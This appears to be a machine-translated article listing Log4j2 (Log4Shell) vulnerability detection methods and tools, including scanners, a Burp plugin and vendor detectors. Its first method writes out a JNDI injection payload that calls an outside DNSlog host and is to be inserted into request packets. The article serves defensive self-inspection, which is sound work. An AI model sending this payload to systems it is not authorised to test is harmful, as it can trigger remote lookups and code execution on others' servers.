Log4j2 vulnerability detection tool list

distance Log4j2 It's been a month since the vulnerability was exposed , The serious impact it has caused does not need to be mentioned again . as time goes on , New vulnerabilities will continue to emerge , Old loopholes will continue to disappear , And this Log4j2 Medium RCE Vulnerabilities can take years to resolve . therefore , In the next period of time , This loophole is still the focus we need to pay attention to .

This paper collects and sorts out several vulnerability detection methods and tools , For use Log4j2 Vulnerability detection and self inspection .

1、dnslog Manual verification method

First, in the dnslog The platform obtains a subdomain name , Try to construct payload, Insert request packet .

${jndi:ldap://bypass.fzuqgl.ceye.io}

adopt dnslog Whether the platform receives the request , Preliminarily judge whether there are loopholes in the target environment .

2、Log4j-scan

One for finding log4j2 Loopholes python Script , Support url testing , Support HTTP Request the head and POST Fuzzy test of data parameters .

github Project address ：

https://github.com/fullhunt/log4j-scan

3、Log4j2 burp Passive scanning plug-in

Through plug-ins , take lLog4j2 Vulnerability detection capabilities are integrated into burp, So as to improve the vulnerability detection ability of security testers .

github Project address ：

https://github.com/f0ng/log4j2burpscanner

Log4j2 burp Passive scanning plug-in effect ：

4、AWVS scanning log4j2 Loophole

AWVS14 Latest version support Log4j2 Vulnerability detection , Support batch scanning , Vulnerability scanning artifact won't let you down , Get ready to update the Arsenal .

5、 Product grade Log4j2 Vulnerability detection tools

This testing tool is based on Tencent security binAuditor, Support Jar/Ear/War Package upload , One click upload to get the test results .

Detection address ：

https://bsca.ms.qq.com/

Jar Packet test results ：

6、Log4j2 Local detection tools

Extracted from Changting Muyun products Log4j2 Local detection tools , It can quickly discover the risk of the current server log4j2 application .

Log4j2 Vulnerability detection tool address ：

https://log4j2-detector.chaitin.cn/

7、360 Log4j2 Test kit

Browser passive scanning + Local detection tools , Provides a complete Log4j2 Vulnerability detection scheme , in addition , The toolkit also includes Log4j2 Patch scheme , Here's the picture ：